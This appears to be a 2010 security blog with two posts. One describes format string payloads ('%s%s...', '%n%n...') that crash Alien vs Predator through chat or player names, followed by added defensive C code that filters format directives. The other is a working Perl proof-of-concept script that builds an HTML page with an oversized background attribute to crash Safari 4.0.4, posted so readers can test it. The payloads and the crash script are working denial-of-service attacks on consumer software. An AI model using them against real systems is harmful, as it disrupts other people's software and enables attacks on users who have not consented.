2010-02-27

New 'Alien vs Predator' Format String Bugs

Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.

Posting the following in Chat (either in game or in the lobby) will crash your game. I am not sure if it will crash other users; I haven't got anybody to test on.

%s%s%s%s%s%s%s%s%s%s
or
%n%n%n%n%n%n%n%n%n%n

Setting your Name to '%n' will stop you from ever joining a game; you just get an error reporting you're unable to connect.
Setting your Name to '%i' will set your Name to random numbers which change as you play.

I tried contacting Steam/Rebellion/Sega, but so far had no response.
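The symptoms above (chat text crashing the client, a name of '%i' rendering as numbers that change) are the classic signs of user-supplied text reaching a printf-style function as the format string rather than as an argument. The C below is an added example, not the game's code or anything from Rebellion, Sega or Steam: it shows the unsafe pattern beside the safe one, and a small directive counter that a client or server could use to reject such names or messages before they reach any formatter. All function and constant names (render_chat, count_format_directives, name_is_safe, LINE_MAX_LEN) are hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical chat-line renderer in the shape the post describes. */
#define LINE_MAX_LEN 256

/* Unsafe pattern, shown only as a comment. Here the player name is the
 * format string itself, so "%s%s%s..." walks the stack reading pointers
 * and "%n" writes to memory; both end in a crash like the one described.
 *
 *   void render_chat_unsafe(char *out, size_t outsz, const char *name)
 *   {
 *       snprintf(out, outsz, name);   // attacker text used as format
 *   }
 */

/* Hardened form: user data is always an argument, never the format.
 * Returns the length snprintf reports so the caller can detect truncation. */
int render_chat(char *out, size_t outsz, const char *name, const char *msg)
{
    return snprintf(out, outsz, "<%s> %s", name, msg);
}

/* Defender-side check: count printf-style conversion directives in a
 * user-supplied string. "%%" is a literal percent and does not count;
 * a trailing lone "%" is ignored. Non-zero for "%n", "%i", "%s%s%s". */
size_t count_format_directives(const char *s)
{
    size_t count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {          /* escaped percent */
            p++;
            continue;
        }
        const char *q = p + 1;
        while (*q && strchr("-+ #0", *q)) q++;                 /* flags */
        while (*q >= '0' && *q <= '9') q++;                    /* width */
        if (*q == '.') {                                       /* precision */
            q++;
            while (*q >= '0' && *q <= '9') q++;
        }
        while (*q && strchr("hlLqjzt", *q)) q++;               /* length */
        if (*q && strchr("diouxXeEfFgGaAcspn", *q)) {          /* conversion */
            count++;
            p = q;
        }
    }
    return count;
}

/* Policy a lobby or server could apply before a name is stored or shown. */
bool name_is_safe(const char *name)
{
    return count_format_directives(name) == 0;
}

/* Helper: render with the hardened function and compare with the text a
 * player should see; false on truncation or mismatch. */
bool renders_literally(const char *name, const char *msg, const char *expected)
{
    char line[LINE_MAX_LEN];
    int n = render_chat(line, sizeof line, name, msg);
    if (n < 0 || (size_t)n >= sizeof line)
        return false;
    return strcmp(line, expected) == 0;
}

int main(void)
{
    /* Constructed sample names, including the two from the post. */
    const char *samples[] = { "%s%s%s%s%s%s%s%s%s%s", "%n", "%i", "Marine_42" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-22s directives=%zu safe=%s\n", samples[i],
               count_format_directives(samples[i]),
               name_is_safe(samples[i]) ? "yes" : "no");

    char line[LINE_MAX_LEN];
    render_chat(line, sizeof line, "%n", "gg");
    printf("rendered: %s\n", line);   /* "%n" appears literally, nothing is written */
    return 0;
}
```

With the hardened renderer a name of '%n' is just three characters on screen; rejecting names and messages that contain directives is a second, independent layer, useful where the formatter cannot be audited (third-party UI code, for instance).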

2010-01-20

New 0Day Safari 'background' DoS

New 0Day Safari DoS I found last night.
Can somebody test to confirm it's working for them?
Usage: perl Safari_4.0.4_background_DoS.pl output.htm 114516
Then browse to output.htm in Safari.


#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7

use strict;
use warnings;

# Output file and length of the 'background' attribute value
my $filename = $ARGV[0];
my $buffer   = $ARGV[1];

# Both arguments are required and the length must be a whole number
if (!defined($filename) || !defined($buffer) || $buffer !~ /^\d+$/) {
    print "Usage: $0 <filename.html> <buffer>\n\n";
    exit 1;
}

my $header = "<html>\n<head>\n";
# The over-long attribute value is what triggers the crash
my $crash  = "<body background = \"" . "A" x $buffer . "\">\n";
my $footer = "</html>\n";

my $data = $header . $crash . $footer;

open(my $fh, '>', $filename) or die "Cannot open $filename: $!\n";
print $fh $data;
close($fh);

exit;